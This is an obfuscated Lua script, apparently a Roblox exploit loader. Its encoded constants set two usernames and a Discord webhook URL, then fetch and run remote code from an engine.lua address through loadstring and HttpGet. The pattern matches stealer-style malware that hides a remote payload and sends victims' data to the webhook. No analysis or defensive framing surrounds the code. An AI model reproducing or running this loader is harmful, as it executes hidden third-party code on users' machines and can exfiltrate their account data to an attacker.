--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.15) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v88=v5(v83,v19);v19=nil;return v88;else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/(((882 -(282 + 595)) -(3 + 0))^(v32-(2 -(1 -0)))))%(2^(((v33-(1 -(1065 -(68 + 997)))) -(v32-(2 -1))) + (620 -((1825 -(226 + 1044)) + 64)))) ;return v84-(v84%(932 -(857 + 74))) ;else local v85=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (8 -6) );v18=v18 + 2 + 0 ;return (v36 * (57 + 199)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (960 -(655 + 237 + 65)) );v18=v18 + (7 -3) ;return (v40 * (16777566 -(87 + (645 -382)))) + (v39 * ((114979 + 41358) -(360887 -270086))) + (v38 * (436 -(67 + 113))) + v37 ;end local function v24()local v41=438 -(145 + (1059 -(745 + 21))) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==0) then v42=v23();v43=v23();v41=953 -(802 + 150) ;end if (v41==(7 -4)) then if (v46==0) then if (v45==(0 + 0)) then return v47 * (0 -0) ;else v46=1 + 0 ;v44=1138 -(116 + 1022) ;end elseif (v46==(3044 -(915 + 82))) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(2210 -(1069 + 118)) ) * (v44 + (v45/((4 -2)^(117 -65)))) ;end if (v41==(3 -(1 + 0))) then v46=v20(v43,4 + 17 ,(148 -94) -23 );v47=((v20(v43,32 + 0 )==1) and  -((3106 -2314) -(368 + 423))) or (3 -2) ;v41=21 -(10 + 1 + 7) ;end if (v41==(1 + 0)) then v44=3 -(2 + 0) ;v45=(v20(v43,443 -(416 + 26) ,63 -43 ) * ((1 + 1)^32)) + v42 ;v41=3 -1 ;end end end local function v25(v48)local v49=1055 -(87 + 968) ;local v50;local v51;while true do if (v49==(13 -10)) then return v6(v51);end if (v49==(2 + 0)) then v51={};for v89=2 -1 , #v50 do v51[v89]=v2(v1(v3(v50,v89,v89)));end v49=3;end if (v49==((1427 -(9 + 5)) -(447 + 966))) then v50=nil;if  not v48 then local v95=(376 -(85 + 291)) -0 ;while true do if (v95==(1817 -(1703 + 114))) then v48=v23();if (v48==(701 -(376 + 325))) then return "";end break;end end end v49=1 -0 ;end if (v49==(2 -(1266 -(243 + 1022)))) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=4 -2 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if ((6 -3)~=v52) then else v59=nil;v60=nil;v52=4;end if (v52~=4) then else v61=nil;while true do if (v53==1) then local v98=0;while true do if (v98~=(0 + 0)) then else v56=nil;v57=nil;v98=1 -0 ;end if (v98~=(1 + 0)) then else v53=2 + 0 ;break;end end end if (v53~=0) then else local v99=0;while true do if (v99==0) then v54=0 + 0 ;v55=nil;v99=1 + 0 ;end if (v99==1) then v53=1 + 0 ;break;end end end if (v53==(4 -2)) then local v100=0;while true do if (v100~=1) then else v53=3;break;end if (v100~=(0 -0)) then else v58=nil;v59=nil;v100=1;end end end if (v53==3) then local v101=0;while true do if (v101==0) then v60=nil;v61=nil;v101=1;end if (v101~=(2 -1)) then else v53=4;break;end end end if (v53~=4) then else while true do if (v54==(1 + 2)) then v61=nil;while true do local v106=0 -0 ;local v107;local v108;while true do if (v106~=(753 -(239 + 514))) then else v107=0;v108=nil;v106=1;end if (v106==(1 + 0)) then while true do if (v107~=(1329 -(797 + 532))) then else v108=0;while true do if (v108~=0) then else if (v55~=2) then else local v161=0 + 0 ;local v162;while true do if (v161==0) then v162=0;while true do if (v162==0) then local v171=0 + 0 ;while true do if ((2 -1)~=v171) then else v162=1;break;end if (0==v171) then for v183=1203 -(373 + 829) ,v60 do local v184=731 -(476 + 255) ;local v185;local v186;local v187;while true do if (v184~=0) then else local v188=0;while true do if (v188~=(1130 -(369 + 761))) then else v185=0;v186=nil;v188=1;end if (v188~=(1 + 0)) then else v184=1;break;end end end if (v184~=1) then else v187=nil;while true do if (v185==1) then if (v186==1) then v187=v21()~=0 ;elseif (v186==(2 -0)) then v187=v24();elseif (v186==3) then v187=v25();end v61[v183]=v187;break;end if (v185~=0) then else local v193=0;local v194;while true do if ((0 -0)~=v193) then else v194=0;while true do if (0==v194) then local v207=238 -(64 + 174) ;while true do if (v207==(0 + 0)) then v186=v21();v187=nil;v207=1 -0 ;end if (1==v207) then v194=1;break;end end end if ((337 -(144 + 192))==v194) then v185=217 -(42 + 174) ;break;end end break;end end end end break;end end end v59[3 + 0 ]=v21();v171=1 + 0 ;end end end if (v162==1) then for v173=1 + 0 ,v23() do local v174=1504 -(363 + 1141) ;local v175;local v176;local v177;while true do if (v174==(1580 -(1183 + 397))) then v175=0 -0 ;v176=nil;v174=1;end if ((1 + 0)~=v174) then else v177=nil;while true do if (v175==(0 + 0)) then local v189=1975 -(1913 + 62) ;while true do if ((0 + 0)==v189) then v176=0;v177=nil;v189=2 -1 ;end if (v189==1) then v175=1934 -(565 + 1368) ;break;end end end if (v175==(3 -2)) then while true do if (v176==0) then v177=v21();if (v20(v177,1,1662 -(1477 + 184) )~=0) then else local v195=0;local v196;local v197;local v198;while true do if (v195==(2 -0)) then local v201=0 + 0 ;local v202;while true do if (v201~=0) then else v202=856 -(564 + 292) ;while true do if (v202==(0 -0)) then local v214=0;while true do if (v214~=(0 -0)) then else if (v20(v197,1,1)==(305 -(244 + 60))) then v198[2 + 0 ]=v61[v198[2]];end if (v20(v197,478 -(41 + 435) ,1003 -(938 + 63) )~=(1 + 0)) then else v198[1128 -(936 + 189) ]=v61[v198[1 + 2 ]];end v214=1614 -(1565 + 48) ;end if (v214~=(1 + 0)) then else v202=1139 -(782 + 356) ;break;end end end if (v202~=1) then else v195=3;break;end end break;end end end if (v195~=(267 -(176 + 91))) then else local v203=0;local v204;while true do if (v203~=0) then else v204=0 -0 ;while true do if (v204~=0) then else local v215=0 -0 ;while true do if (v215==0) then v196=v20(v177,1094 -(975 + 117) ,1878 -(157 + 1718) );v197=v20(v177,4,6);v215=1 + 0 ;end if (v215~=1) then else v204=1;break;end end end if (v204~=(3 -2)) then else v195=3 -2 ;break;end end break;end end end if (3==v195) then if (v20(v197,3,1021 -(697 + 321) )~=(2 -1)) then else v198[4]=v61[v198[4]];end v56[v173]=v198;break;end if (v195~=1) then else local v206=0 -0 ;while true do if (v206~=(2 -1)) then else v195=1 + 1 ;break;end if (v206~=(0 -0)) then else v198={v22(),v22(),nil,nil};if (v196==(1227 -(322 + 905))) then local v210=611 -(602 + 9) ;local v211;local v212;local v213;while true do if (v210~=1) then else v213=nil;while true do if (v211==0) then v212=1189 -(449 + 740) ;v213=nil;v211=873 -(826 + 46) ;end if (v211~=1) then else while true do if (0==v212) then v213=947 -(245 + 702) ;while true do if (v213==(0 -0)) then v198[1 + 2 ]=v22();v198[4]=v22();break;end end break;end end break;end end break;end if (v210==0) then v211=0;v212=nil;v210=1899 -(260 + 1638) ;end end elseif (v196==(441 -(382 + 58))) then v198[3]=v23();elseif (v196==2) then v198[3]=v23() -((6 -4)^16) ;elseif (v196~=3) then else local v222=0;local v223;while true do if (v222~=0) then else v223=0;while true do if (0==v223) then v198[3]=v23() -(2^(14 + 2)) ;v198[4]=v22();break;end end break;end end end v206=1;end end end end end break;end end break;end end break;end end end v55=3;break;end end break;end end end if ((5 -2)==v55) then local v163=0;local v164;local v165;while true do if ((0 -0)~=v163) then else v164=1205 -(902 + 303) ;v165=nil;v163=1;end if (v163~=1) then else while true do if ((0 -0)==v164) then v165=0;while true do if (v165~=0) then else local v179=0 -0 ;local v180;while true do if ((0 + 0)==v179) then v180=0;while true do if (v180~=0) then else local v190=0;while true do if (v190~=(1690 -(1121 + 569))) then else for v199=1,v23() do v57[v199-1 ]=v28();end return v59;end end end end break;end end end end break;end end break;end end end v108=1;end if (v108==1) then if (v55==(215 -(22 + 192))) then local v166=683 -(483 + 200) ;local v167;local v168;while true do if (v166==0) then v167=1463 -(1404 + 59) ;v168=nil;v166=2 -1 ;end if (v166~=(1 -0)) then else while true do if (0~=v167) then else v168=765 -(468 + 297) ;while true do if (v168~=0) then else local v181=0;local v182;while true do if (v181==(562 -(334 + 228))) then v182=0 -0 ;while true do if (v182~=(2 -1)) then else v168=1 -0 ;break;end if (v182==(0 + 0)) then local v191=236 -(141 + 95) ;while true do if (v191~=1) then else v182=1 + 0 ;break;end if (v191~=0) then else v59={v56,v57,nil,v58};v60=v23();v191=1;end end end end break;end end end if (v168==1) then v61={};v55=5 -3 ;break;end end break;end end break;end end end if (v55~=0) then else local v169=0 + 0 ;local v170;while true do if (v169~=(0 + 0)) then else v170=0;while true do if (v170~=(0 -0)) then else local v172=0;while true do if (v172~=(1 + 0)) then else v170=1;break;end if (v172==0) then v56={};v57={};v172=164 -(92 + 71) ;end end end if ((1 + 0)~=v170) then else v58={};v55=1 -0 ;break;end end break;end end end break;end end break;end end break;end end end break;end if (v54~=2) then else local v102=0;local v103;while true do if (0==v102) then v103=765 -(574 + 191) ;while true do if (v103==(1 + 0)) then v54=3;break;end if (v103==(0 -0)) then local v136=0 + 0 ;while true do if (v136==(849 -(254 + 595))) then v59=nil;v60=nil;v136=127 -(55 + 71) ;end if (v136~=1) then else v103=1;break;end end end end break;end end end if (v54~=(0 -0)) then else local v104=0;local v105;while true do if ((1790 -(573 + 1217))==v104) then v105=0;while true do if ((2 -1)~=v105) then else v54=1 + 0 ;break;end if (0~=v105) then else local v137=0 -0 ;while true do if (v137~=0) then else v55=0;v56=nil;v137=940 -(714 + 225) ;end if (1==v137) then v105=2 -1 ;break;end end end end break;end end end if (v54==1) then v57=nil;v58=nil;v54=2;end end break;end end break;end if ((2 -0)==v52) then v57=nil;v58=nil;v52=1 + 2 ;end if (v52~=1) then else v55=nil;v56=nil;v52=2;end if (v52~=(0 -0)) then else v53=806 -(118 + 688) ;v54=nil;v52=49 -(25 + 23) ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v87=0;while true do if (v87==1) then if (v81<=9) then if (v81<=4) then if (v81<=1) then if (v81==0) then local v109=v80[2];local v110=v78[v80[3]];v78[v109 + 1 ]=v110;v78[v109]=v110[v80[4]];else local v114=v80[2];v78[v114]=v78[v114](v13(v78,v114 + 1 ,v73));end elseif (v81<=2) then v78[v80[2]]=v80[3];elseif (v81==3) then v64[v80[3]]=v78[v80[2]];else v78[v80[2]]=v80[3];end elseif (v81<=6) then if (v81>5) then v64[v80[3]]=v78[v80[2]];else local v120=0;local v121;local v122;local v123;local v124;while true do if (v120==1) then v73=(v123 + v121) -1 ;v124=0;v120=2;end if (v120==0) then v121=v80[2];v122,v123=v71(v78[v121](v13(v78,v121 + 1 ,v80[3])));v120=1;end if (v120==2) then for v149=v121,v73 do v124=v124 + 1 ;v78[v149]=v122[v124];end break;end end end elseif (v81<=7) then v78[v80[2]]();elseif (v81==8) then local v142=v80[2];v78[v142]=v78[v142](v13(v78,v142 + 1 ,v73));elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=14) then if (v81<=11) then if (v81>10) then do return;end else local v125=v80[2];local v126,v127=v71(v78[v125](v13(v78,v125 + 1 ,v80[3])));v73=(v127 + v125) -1 ;local v128=0;for v134=v125,v73 do local v135=0;while true do if (v135==0) then v128=v128 + 1 ;v78[v134]=v126[v128];break;end end end end elseif (v81<=12) then v78[v80[2]]=v64[v80[3]];elseif (v81==13) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v78[v80[2]]();end elseif (v81<=16) then if (v81>15) then v78[v80[2]]=v64[v80[3]];else v72=v80[3];end elseif (v81<=17) then do return;end elseif (v81>18) then local v144=0;local v145;local v146;while true do if (v144==1) then v78[v145 + 1 ]=v146;v78[v145]=v146[v80[4]];break;end if (v144==0) then v145=v80[2];v146=v78[v80[3]];v144=1;end end else v72=v80[3];end v72=v72 + 1 ;break;end if (0==v87) then v80=v68[v72];v81=v80[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03093O00557365724E616D6532030A3O00527562726E4A61793137030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F6A616E65712E73706163652F656E67696E652E6C756103083O00557365724E616D65030A3O005267616D696E6731373103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31342O35342O3234373638353833323738342F70487A786B6855776D34426F694254436E76626F494C732O2D562D7341684B34725F4E46687A4D452O57694A57337773494F4578427054493469782D625873757A74644700163O0012023O00013O00260D3O000D0001000200040F3O000D0001001202000100043O001206000100033O00120C000100053O00120C000200063O002013000200020007001202000400084O000A000200044O000100013O00022O000700010001000100040F3O0015000100260D3O00010001000100040F3O000100010012020001000A3O001206000100093O0012020001000C3O0012060001000B3O0012023O00023O00040F3O000100012O00113O00017O00",v9(),...);
